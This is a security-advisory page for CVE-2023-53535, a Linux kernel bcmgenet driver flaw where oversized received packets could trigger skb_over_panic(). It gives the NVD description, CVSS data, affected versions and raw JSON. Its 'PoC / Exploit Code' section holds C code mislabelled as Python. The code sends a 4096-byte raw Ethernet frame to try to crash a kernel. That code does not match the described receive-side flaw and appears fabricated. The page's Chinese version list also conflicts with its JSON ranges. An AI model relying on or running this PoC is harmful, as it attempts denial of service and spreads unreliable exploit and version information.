Security Vulnerability Report
中文
CVE-2023-53535 CVSS 5.5 MEDIUM

CVE-2023-53535

Published: 2025-10-04 16:15:48
Last Modified: 2026-03-23 18:37:23
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: net: bcmgenet: Add a check for oversized packets Occasionnaly we may get oversized packets from the hardware which exceed the nomimal 2KiB buffer size we allocate SKBs with. Add an early check which drops the packet to avoid invoking skb_over_panic() and move on to processing the next packet.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.6(受bcmgenet驱动漏洞影响)
Linux Kernel 6.6.x(部分版本)
Linux Kernel 6.1.x LTS(部分版本)
Linux Kernel 5.15.x LTS(部分版本)
Linux Kernel 5.10.x LTS(部分版本)
Linux Kernel 5.4.x LTS(部分版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2023-53535 PoC - Trigger oversized packet handling in bcmgenet driver // This PoC demonstrates how to trigger the vulnerability by sending oversized packets // to a system using the bcmgenet network driver. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/if_packet.h> #include <linux/if_ether.h> #include <sys/ioctl.h> #include <net/if.h> #include <arpa/inet.h> #define OVERSIZED_PACKET_SIZE 4096 // Larger than the 2KiB SKB buffer #define INTERFACE_NAME "eth0" // Default bcmgenet interface name int main(int argc, char *argv[]) { int sockfd; struct ifreq ifr; struct sockaddr_ll sll; unsigned char packet[OVERSIZED_PACKET_SIZE]; const char *ifname = (argc > 1) ? argv[1] : INTERFACE_NAME; // Create raw packet socket sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); if (sockfd < 0) { perror("socket"); return 1; } // Get interface index memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, ifname, IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &ifr) < 0) { perror("ioctl SIOCGIFINDEX"); close(sockfd); return 1; } // Setup socket address structure memset(&sll, 0, sizeof(sll)); sll.sll_family = AF_PACKET; sll.sll_ifindex = ifr.ifr_ifindex; sll.sll_protocol = htons(ETH_P_ALL); // Construct an oversized Ethernet frame memset(packet, 0xFF, sizeof(packet)); // Set destination MAC packet[0] = 0xFF; packet[1] = 0xFF; packet[2] = 0xFF; packet[3] = 0xFF; packet[4] = 0xFF; packet[5] = 0xFF; // Set source MAC packet[6] = 0x00; packet[7] = 0x00; packet[8] = 0x00; packet[9] = 0x00; packet[10] = 0x00; packet[11] = 0x01; // EtherType packet[12] = 0x08; packet[13] = 0x00; // IPv4 printf("Sending oversized packet (%d bytes) on interface %s\n", OVERSIZED_PACKET_SIZE, ifname); // Send the oversized packet to trigger skb_over_panic() // The packet size exceeds the 2KiB SKB buffer allocated by bcmgenet if (sendto(sockfd, packet, OVERSIZED_PACKET_SIZE, 0, (struct sockaddr *)&sll, sizeof(sll)) < 0) { perror("sendto"); close(sockfd); return 1; } printf("Oversized packet sent. If vulnerable, kernel panic may occur.\n"); close(sockfd); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53535", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:48.457", "lastModified": "2026-03-23T18:37:22.950", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bcmgenet: Add a check for oversized packets\n\nOccasionnaly we may get oversized packets from the hardware which\nexceed the nomimal 2KiB buffer size we allocate SKBs with. Add an early\ncheck which drops the packet to avoid invoking skb_over_panic() and move\non to processing the next packet."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.15", "versionEndExcluding": "4.14.308", "matchCriteriaId": "F6529FA7-0DC2-41A2-AEE7-C43E9796C426"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.276", "matchCriteriaId": "C902FC54-DDBD-4DA6-BFEF-26889A267464"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.235", "matchCriteriaId": "13DD5E68-8CB4-46EE-9A8F-C7F6C1A84430"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.173", "matchCriteriaId": "4D810CFB-B7C5-493C-B98A-0D5F0D8A47B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.99", "matchCriteriaId": "5B8B2AC9-2F31-4A0F-96F5-7E26B50B27BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.16", "matchCriteriaId": "0FD95FDA-6525-4B13-B3FB-49D9995FD8ED"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.3", "matchCriteriaId": "88C67289-22AD-4CA9-B202-5F5A80E5BA4B"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/124ca24e0de958d2e20e0aa1e2434af7b72f8887", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/411317d2a4a7d6049d8efeef0d32ae43f8baefce", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5c0862c2c962052ed5055220a00ac1cefb92fbcd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5f56767fb5f2df875b6553e08dbec6a45431c988", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7cdb07e10c1258c08f31b24898930e4ece88d163", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/841881320562cbeac7046b537b91cd000480cea2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/87363d1ab55e497702a9506ff423c422639c8a25", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c34b1c0870323649d45c5074828d7f754dea2673", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.